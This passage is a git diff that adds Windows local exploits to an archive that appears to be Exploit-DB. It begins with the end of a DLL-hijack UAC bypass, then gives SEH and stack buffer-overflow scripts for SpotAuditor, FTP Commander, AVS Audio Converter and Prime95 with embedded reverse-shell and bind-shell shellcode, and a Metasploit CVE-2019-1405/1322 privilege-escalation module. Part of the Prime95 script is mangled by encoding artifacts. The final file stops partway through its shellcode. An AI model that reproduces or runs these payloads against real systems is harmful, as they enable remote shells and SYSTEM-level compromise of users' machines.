,0x63 ,0x72 ,0x74 ,0x5f ,0x78 ,0x74 ,0x5f ,0x65 ,0x6e ,0x64 ,0x5f ,0x5f ,0x00 ,0x5f ,0x5f ,0x73 ,0x65 ,0x63 ,0x75 ,0x72 ,0x69 ,0x74 ,0x79 ,0x5f ,0x63 ,0x6f ,0x6f ,0x6b ,0x69 ,0x65 ,0x00 } ; 
+
+   FILE *picFile = fopen("C:\\Windows \\System32\\propsys.dll","wb");
+   fwrite(bin, sizeof(bin), 1, picFile);
+   fclose(picFile);
+   system("\"C:\\Windows \\System32\\WSReset.exe\" > C:\\users\\public\\output.log 2>&1");
+   printf("[-] You G0t Admin Shell !!!");
+   
+   return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows/local/47759.py b/exploits/windows/local/47759.py
new file mode 100755
index 000000000..5575e5e36
--- /dev/null
+++ b/exploits/windows/local/47759.py
@@ -0,0 +1,69 @@
+# Exploit Title: SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow (SEH)
+# Exploit Author: Kirill Nikolaev
+# Date: 2019-12-06
+# Vulnerable Software: SpotAuditor
+# Vendor Homepage: http://www.nsauditor.com/
+# Version: 5.3.2
+# Software Link: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
+# Tested Windows 7 SP1 x86
+
+# PoC
+# 1. Download and install SpotAuditor
+# 2. Change shellcode in python script to yours
+# 3. Generate payload with python script
+# 4. Run the software "Tools -> Base64 Encrypted Password
+# 5. Take a shell
+# Original DOS exploit https://www.exploit-db.com/exploits/47719
+
+#!/usr/bin/env python
+
+import base64
+print ("[+] Thank you for choosing our company")
+print ("[+] Local Buffer Overflow (SEH) in SpotAuditor 5.3.2")
+print ("[+] Created By Kirill Nikolaev")
+print ("[+] Generate payload,check, that you take your shellcode")
+print ("")
+head='A'*1024
+#eb0c-jmp across a few bytes with seh address
+jmp_across='\x41\x41\xeb\x0c'
+#0x61e0b194 : pop ebx # pop ebp # ret  |  {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.15.2 (C:\Program Files\Nsasoft\SpotAuditor\sqlite3.dll)
+seh='\x94\xb1\xe0\x61'
+header_for_shellcode='\x41'*10
+#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.58.1 LPORT=4444 -f py EXITFUNC=thread -b '\x00'
+buf = ""
+buf += b"\xbd\x7a\xfe\x84\xdd\xdb\xc9\xd9\x74\x24\xf4\x58\x31"
+buf += b"\xc9\xb1\x52\x83\xe8\xfc\x31\x68\x0e\x03\x12\xf0\x66"
+buf += b"\x28\x1e\xe4\xe5\xd3\xde\xf5\x89\x5a\x3b\xc4\x89\x39"
+buf += b"\x48\x77\x3a\x49\x1c\x74\xb1\x1f\xb4\x0f\xb7\xb7\xbb"
+buf += b"\xb8\x72\xee\xf2\x39\x2e\xd2\x95\xb9\x2d\x07\x75\x83"
+buf += b"\xfd\x5a\x74\xc4\xe0\x97\x24\x9d\x6f\x05\xd8\xaa\x3a"
+buf += b"\x96\x53\xe0\xab\x9e\x80\xb1\xca\x8f\x17\xc9\x94\x0f"
+buf += b"\x96\x1e\xad\x19\x80\x43\x88\xd0\x3b\xb7\x66\xe3\xed"
+buf += b"\x89\x87\x48\xd0\x25\x7a\x90\x15\x81\x65\xe7\x6f\xf1"
+buf += b"\x18\xf0\xb4\x8b\xc6\x75\x2e\x2b\x8c\x2e\x8a\xcd\x41"
+buf += b"\xa8\x59\xc1\x2e\xbe\x05\xc6\xb1\x13\x3e\xf2\x3a\x92"
+buf += b"\x90\x72\x78\xb1\x34\xde\xda\xd8\x6d\xba\x8d\xe5\x6d"
+buf += b"\x65\x71\x40\xe6\x88\x66\xf9\xa5\xc4\x4b\x30\x55\x15"
+buf += b"\xc4\x43\x26\x27\x4b\xf8\xa0\x0b\x04\x26\x37\x6b\x3f"
+buf += b"\x9e\xa7\x92\xc0\xdf\xee\x50\x94\x8f\x98\x71\x95\x5b"
+buf += b"\x58\x7d\x40\xcb\x08\xd1\x3b\xac\xf8\x91\xeb\x44\x12"
+buf += b"\x1e\xd3\x75\x1d\xf4\x7c\x1f\xe4\x9f\x42\x48\xdc\x5e"
+buf += b"\x2b\x8b\x20\x70\xf7\x02\xc6\x18\x17\x43\x51\xb5\x8e"
+buf += b"\xce\x29\x24\x4e\xc5\x54\x66\xc4\xea\xa9\x29\x2d\x86"
+buf += b"\xb9\xde\xdd\xdd\xe3\x49\xe1\xcb\x8b\x16\x70\x90\x4b"
+buf += b"\x50\x69\x0f\x1c\x35\x5f\x46\xc8\xab\xc6\xf0\xee\x31"
+buf += b"\x9e\x3b\xaa\xed\x63\xc5\x33\x63\xdf\xe1\x23\xbd\xe0"
+buf += b"\xad\x17\x11\xb7\x7b\xc1\xd7\x61\xca\xbb\x81\xde\x84"
+buf += b"\x2b\x57\x2d\x17\x2d\x58\x78\xe1\xd1\xe9\xd5\xb4\xee"
+buf += b"\xc6\xb1\x30\x97\x3a\x22\xbe\x42\xff\x42\x5d\x46\x0a"
+buf += b"\xeb\xf8\x03\xb7\x76\xfb\xfe\xf4\x8e\x78\x0a\x85\x74"
+buf += b"\x60\x7f\x80\x31\x26\x6c\xf8\x2a\xc3\x92\xaf\x4b\xc6"
+tail='B'*(5000-1028-4-10-len(buf))
+shellcode=head+jmp_across+seh+header_for_shellcode+buf
+print (base64.b64encode(shellcode))
+
+
+--
+Best regards,
+Kirill Nikolaev
+Penetration Tester
\ No newline at end of file
diff --git a/exploits/windows/local/47775.py b/exploits/windows/local/47775.py
new file mode 100755
index 000000000..35f6a3eee
--- /dev/null
+++ b/exploits/windows/local/47775.py
@@ -0,0 +1,100 @@
+# Exploit Title: FTP Commander Pro 8.03 - Local Stack Overflow 
+# Date: 2019-12-12
+# Exploit Author: boku
+# Discovered by: UN_NON
+# Original DoS: FTP Commander 8.02 - Overwrite (SEH) 
+# Original DoS Link: https://www.exploit-db.com/exploits/37810
+# Software Vendor: http://www.internet-soft.com/
+# Software Link: http://www.internet-soft.com/DEMO/cftpsetup.exe
+# Version: Version 8.03 & Version 8.02 (same exploit for both)
+# Tested on: Windows 10 Home 1909      (64-bit; OS-build=18363.418)
+# Windows 10 Education 1909 (32-bit; OS-build=18363.418)
+# Windows 10 Pro  1909      (32-bit; OS-build=18363.418)
+# Windows Vista Home Basic SP1 (6.0.6001 Build 6001)
+# Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600
+# Python Version:       Python 2.7.16+
+
+# Recreate:
+#   1) Generate 'poc.txt' payload using python 2.7.x
+#   2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
+#   3) Install & Open ftpCommander v8.03 (or v8.02)
+#   4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
+#      - A textbox will appear on the bottom of the right window
+#   5) Paste payload from generated txt file into textbox
+#   6) Click "Do it"
+#      - The program will crash & calculator will open
+# Other Security Issue:    
+#   - The program's default install path is: C:\\cftp\cftp.exe
+
+#!/usr/bin/python
+
+blt = '\033[92m[\033[0m+\033[92m]\033[0m '           # bash green success bullet
+err = '\033[91m[\033[0m!\033[91m]\033[0m '           # bash red   error   bullet
+
+try:
+    # EIP offset at 4108 -- if you exceed 4112 bytes you will overwrite nSEH & SEH
+    nops='CGS[BOKU]J'*100   # 1000 nops that are ASCII friendly
+    # EIP jump lands at the beginning of the buffer
+    # Shellcode can be up to 4108 bytes by adjusting nops & replacing shellcode
+    # msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
+    #x86/alpha_upper succeeded with size 447 (iteration=0)
+    shellcode =  b""
+    shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
+    shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
+    shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
+    shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
+    shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
+    shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
+    shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
+    shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
+    shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
+    shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
+    shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
+    shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
+    shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
+    shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
+    shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
+    shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
+    shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
+    shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
+    shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
+    shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
+    shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
+    shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
+    shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
+    shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
+    shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
+    shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
+    shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
+    shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
+    shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
+    shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
+    shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
+    shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
+    shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
+    shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
+    shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
+    shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
+    shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
+    shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
+    shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
+    shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
+    shellcode += b"\x4c\x32\x43\x53\x30\x41\x41"
+    # Fill the rest of the space with B's until we are at our EIP offset
+    offset     = '\x42'*(4108-len(nops+shellcode))
+    # The EAX register holds a Pointer to the beginning of our buffer
+    #   FF20 = jmp [eax]
+    #   !mona find -o -s '\xFF\x20' 
+    #   0x0041081a : '\xFF\x20' | startnull,ascii {PAGE_EXECUTE_READ} [ftpcomm.exe] 
+    #   | ASLR: False; Rebase: False; SafeSEH: False; 
+    eip        = '\x1a\x08\x41'   # 3 byte overwrite so we can set EIP to start with 0x00
+    # After jmp [eax], we land at the beginning of our buffer
+    payload    = nops+shellcode+offset+eip
+    File       = 'poc.txt'
+    f          = open(File, 'w')  # open file for write
+    f.write(payload)
+    f.close()                     # close the file
+    print blt + File + " created successfully "
+
+except:
+    print err + File + ' failed to create'
\ No newline at end of file
diff --git a/exploits/windows/local/47788.py b/exploits/windows/local/47788.py
new file mode 100755
index 000000000..1697eb0a5
--- /dev/null
+++ b/exploits/windows/local/47788.py
@@ -0,0 +1,56 @@
+# Exploit Title: AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow
+# Exploit Author : ZwX
+# Exploit Date: 2019-12-17
+# Vendor Homepage : http://www.avs4you.com/
+# Link Software : http://www.avs4you.com/avs-audio-converter.aspx
+# Tested on OS: Windows 7
+
+'''
+Technical Details & Description:
+================================
+A local buffer overflow vulnerability has been discovered in tihe official AVS Audio Converter. 
+The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process. 
+The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. 
+The vulnerability is marked as classic buffer overflow issue.
+
+
+Analyze Registers:
+==================
+(1e74.1b78): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000000 ecx=42424242 edx=778c6d1d esi=00000000 edi=00000000
+eip=42424242 esp=0012f098 ebp=0012f0b8 iopl=0         nv up ei pl zr na pe nc
+cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
+42424242 ??              ???
+0:000> !exchain
+0012f0ac: ntdll!ExecuteHandler2+3a (778c6d1d)
+0012fa30: 42424242
+Invalid exception stack at 41414141
+
+
+Note: EIP & ECX  overwritten
+
+
+Proof of Concept (PoC):
+=======================
+1.Download and install AVS Audio Converter
+2.Open the AVS Audio Converter 
+3.Run the python operating script that will create a file (poc.txt)
+4.copy and paste the characters found in the file (poc.txt) in the field "Exit folder"
+5.Click on browse
+6.EIP overwritten
+'''
+
+#!/usr/bin/python
+
+buffer = "\x41" * 264
+a = "\x42" * 4
+b = "\x43" * 1000
+
+poc = buffer + a + b 
+file = open("poc.txt","w")
+file.write(poc)
+file.close()
+ 
+print "POC Created by ZwX"
\ No newline at end of file
diff --git a/exploits/windows/local/47802.py b/exploits/windows/local/47802.py
new file mode 100755
index 000000000..65f6b89e7
--- /dev/null
+++ b/exploits/windows/local/47802.py
@@ -0,0 +1,65 @@
+# Exploit Title: Prime95 Version 29.8 build 6 - Buffer Overflow (SEH)
+# Date: 2019-12-22
+# Vendor Homepage: https://www.mersenne.org
+# Software Link:   http://www.mersenne.org/ftp_root/gimps/p95v298b6.win32.zip
+# Exploit Author: Achilles
+# Tested Version: 29.8 build 6
+# Tested on: Windows 7 x64
+
+# 1.- Run python code:Prime95.py
+# 2.- Open EVIL.txt and copy content to Clipboard
+# 3.- Open Prime95.exe go to PrimeNet
+# 4.- Paste the Content of EVIL.txt into the field "Optional User ID and Optional Computer Name"
+# 5.- Click Connection Paste the Content of EVIL.txt into the field "Option al proxy Host"
+# 6.- Press ok Twice and you will have a bind shell port 3110
+# 7.- Greetings go:XiDreamzzXi,Metatron
+
+#!/usr/bin/env python
+
+import struct
+
+buffer =3D "\x41" * 660
+nseh =3D "\xeb\x06\x90\x90" #jmp short 6
+seh  =3D  struct.pack('<L',0x6ee410b1) #libhwloc-15.dll
+nops =3D  "\x90" * 20
+
+#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
+#badchars "\x00\x0a\x0d"
+shellcode =3D ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"=20
+"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
+"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
+"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
+"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
+"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
+"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
+"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
+"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
+"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
+"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
+"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
+"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
+"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
+"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
+"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
+"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
+"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
+"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
+"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
+"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
+"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
+"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
+"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
+"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
+"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
+"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
+"\x77\x03\x31\x3a")
+payload =3D buffer + nseh + seh + nops + shellcode
+
+try:
+Dopen("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(payload)
+f.write(payload)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/47805.rb b/exploits/windows/local/47805.rb
new file mode 100755
index 000000000..b80e00fd6
--- /dev/null
+++ b/exploits/windows/local/47805.rb
@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft UPnP Local Privilege Elevation Vulnerability',
+      'Description'    => %q(
+      This exploit uses two vulnerabilities to execute a command as an elevated user.
+      The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to
+      NT AUTHORITY\LOCAL SERVICE
+      The second (CVE-2019-1322) leverages the Update Orchestrator Service to
+      elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'NCC Group',            # Original discovery (https://www.nccgroup.trust/uk/)
+          'hoangprod',            # PoC
+          'bwatters-r7'           # msf module
+        ],
+      'Platform'       => ['win'],
+      'SessionTypes'   => ['meterpreter'],
+      'Targets'        =>
+        [
+          ['Windows x64', { 'Arch' => ARCH_X64 }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 12 2019',
+      'References'     =>
+        [
+          ['CVE', '2019-1322'],
+          ['CVE', '2019-1405'],
+          ['EDB', '47684'],
+          ['URL', 'https://github.com/apt69/COMahawk'],
+          ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],
+          ['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']
+        ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => false
+        }
+    ))
+
+    register_options([
+      OptString.new('EXPLOIT_NAME',
+        [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
+      OptString.new('PAYLOAD_NAME',
+        [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
+      OptString.new('WRITABLE_DIR',
+        [false, 'Path to write binaries (%TEMP% by default).', nil]),
+      OptInt.new('EXPLOIT_TIMEOUT',
+        [true, 'The number of seconds to wait for exploit to finish running', 60]),
+      OptInt.new('EXECUTE_DELAY',
+        [true, 'The number of seconds to delay between file upload and exploit launch', 3])
+    ])
+  end
+
+  def exploit
+    exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)
+    exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')
+    payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe')
+    temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')
+    payload_path = "#{temp_path}\\#{payload_name}"
+    exploit_path = "#{temp_path}\\#{exploit_name}"
+    payload_exe = generate_payload_exe
+
+    # Check target
+    vprint_status("Checking Target")
+    validate_active_host
+    validate_target
+    fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)
+
+    # Upload Exploit
+    vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")
+    ensure_clean_destination(exploit_path)
+    exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')
+    write_file(exploit_path, exploit_bin)
+    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
+
+    # Upload Payload
+    vprint_status("Uploading Payload")
+    ensure_clean_destination(payload_path)
+    write_file(payload_path, payload_exe)
+    print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
+    print_warning("This exploit requires manual cleanup of the payload #{payload_path}")
+
+    # Run Exploit
+    vprint_status("Running Exploit")
+    print_status("It may take a moment after the session is established for the exploit to exit safely.")
+    begin
+      cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60)
+    rescue Rex::TimeoutError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      print_error("Caught timeout.  Exploit may be taking longer or it may have failed.")
+    end
+    vprint_status("Cleaning up #{exploit_path}")
+    ensure_clean_destination(exploit_path)
+  end
+
+  def validate_active_host
+    begin
+      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      raise Msf::Exploit::Failed, 'Could not connect to session'
+    end
+  end
+
+  def validate_target
+    if sysinfo['Architecture'] == ARCH_X86
+      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
+    end
+    sysinfo_value = sysinfo['OS']
+    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
+    vprint_status("Build Number = #{build_num}")
+    unless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362)
+      fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')
+    end
+  end
+
+  def ensure_clean_destination(path)
+    return unless file?(path)
+    print_status("#{path} already exists on the target. Deleting...")
+    begin
+      file_rm(path)
+      print_status("Deleted #{path}")
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      print_error("Unable to delete #{path}")
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/local/47810.py b/exploits/windows/local/47810.py
new file mode 100755
index 000000000..c2c73ab70
--- /dev/null
+++ b/exploits/windows/local/47810.py
@@ -0,0 +1,114 @@
+# Exploit Title: AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
+# Date: December 2019-12-28
+# Exploit Author: boku
+# Original DoS: https://www.exploit-db.com/exploits/47788
+# Original DoS Author: ZwX
+# Software Vendor: http://www.avs4you.com/
+# Software Link: http://www.avs4you.com/avs-audio-converter.aspx
+# Version: 9.1.2.600
+# Tested on: Microsoft Windows 10 Home 1909(x86-64) - 10.0.18363 N/A Build 18363
+#            Microsoft Windows 7 Enterprise(x86-64) - 6.1.7601 Service Pack 1 Build 7601
+
+#!/usr/bin/python
+# Recreate:
+#   1) Generate the 'bind9999.txt' payload using python 2.7.x on Kali Linux.
+#   2) On the victim Windows machine, open the file 'bind9999.txt' with notepad, then Select-All > Copy.
+#   3) Install & Open AVS Audio Converter 9.1.2.600.
+#   4) Locate the textbox to the right of 'Output Folder:'; at the bottom of the main window.
+#   5) Paste the copied payload from the 'bind9999.txt' file into the textbox.
+#   6) Click the 'Browse...' button; to the right of the textbox.
+#      - The program will freeze & a bind shell will be listening on tcp port 9999; on all interfaces.
+# Special thanks to: The Offsec Team, Corelan Team, Vivek/Pentester Academy Team, Skape
+blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet
+err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red   error   bullet
+File = 'bind9999.txt'
+try:
+    # 0x00400000 [AVSAudioConverter.exe]
+    #   9.1.2.600 (C:\Program Files (x86)\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)
+    #   - The only module that has SafeSEH disabled.
+    #   Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | 
+    #   0x00400000 | 0x00f33000 | False  | False   | False |  False   | False  | 
+    #   - Attempting a 3-byte SEH-handler overwrite will fail due to no exception being thrown.
+    offEdx  = '\x41'*260
+    edx     = '\x42\x42\x42\x42' # EDX overwrite at 260 bytes. EDX=0x42424242
+    # SEH-Record overwrite at offset 264; the goal from here is to not throw an exception or we're screwed.
+    nSEH    = '\x42'*4
+    SEH     = '\x43'*4
+    # - If address at offset 308 is not readable, then the program will throw an exception at:
+    #   75F9ECE7    3806            cmp byte ptr ds:[esi], al
+    #   [!] Access violation when reading [esi] 
+    # - If we can get past this exception, we can overwrite EIP at offset 304.
+    # - [esi] must be successfully overwriten so we can put our payload after it.
+    offEip  = '\x45'*32
+    # - AVSAudioEditor5.dll is the only other module with both ASLR & Rebase disabled. 
+    # - The enabled SafeSEH blocks us from using it for a SEH overwrite, but we can still jump 
+    #    to it with a vanilla EIP overwrite; due to overwriting a return address on the stack.
+    # - After bypassing the ESI read exception, our stack will look like this after the EIP overwrite:
+    #   ECX=0018FA60  ESP=0018FA60 (Stack locations will vary)
+    #        0018FA54   45454545  EEEE // [296]
+    #        0018FA58   45454545  EEEE // [300]
+    #        0018FA5C   1006563E  V... // [304] eip var # Pointer to 'pop+ret'
+    #       *0018FA60   00000000  .... // [308] esi var # our esi address gets replaced by 4 nulls
+    #        0018FA64   1006A438  8... // [312] jmpEsp var # Pointer to 'jmp esp'
+    #        0018FA68   E510EC10  .... // [316] fixStack var # ASM to fix the Stack so shellcode will work
+    # [AVSAudioEditor5.dll] (C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSAudioEditor5.dll) 
+    #   Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | 
+    #   0x10000000 | 0x100a1000 | False  | True    | False |  False   | False  | 
+    # 0x1006563e : pop esi # ret  | ascii {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
+    eip      = '\x3e\x56\x06\x10' # pop+ret
+    # - After pop+ret, ESP=0018FA68
+    esi      = '\x10\x10\x08\x10' # [AVSAudioEditor5.dll] | .data | RW
+    #   0x1006a438 : jmp esp |  {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
+    # - the esi var address is just a random, readable memory location that will not move; to bypass the exception.
+    jmpEsp   = '\x38\xa4\x06\x10' # jmp esp pointer
+    # EBP is 45454545 at this point. Needs to be fixed for most shellcode payloads to work properly.
+    fixStack = '\x83\xEC\x10'     # sub esp, 0x10
+    fixStack += '\x89\xE5'        # mov ebp, esp
+    fixStack += '\x83\xEC\x60'    # sub esp, 0x60
+    #msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b '\x00' --format python
+    # x86/shikata_ga_nai succeeded with size 355 (iteration=0)
+    shellcode =  b""
+    shellcode += b"\xbe\xd8\x49\x8d\x72\xd9\xe5\xd9\x74\x24\xf4"
+    shellcode += b"\x5a\x31\xc9\xb1\x53\x31\x72\x12\x83\xea\xfc"
+    shellcode += b"\x03\xaa\x47\x6f\x87\xb6\xb0\xed\x68\x46\x41"
+    shellcode += b"\x92\xe1\xa3\x70\x92\x96\xa0\x23\x22\xdc\xe4"
+    shellcode += b"\xcf\xc9\xb0\x1c\x5b\xbf\x1c\x13\xec\x0a\x7b"
+    shellcode += b"\x1a\xed\x27\xbf\x3d\x6d\x3a\xec\x9d\x4c\xf5"
+    shellcode += b"\xe1\xdc\x89\xe8\x08\x8c\x42\x66\xbe\x20\xe6"
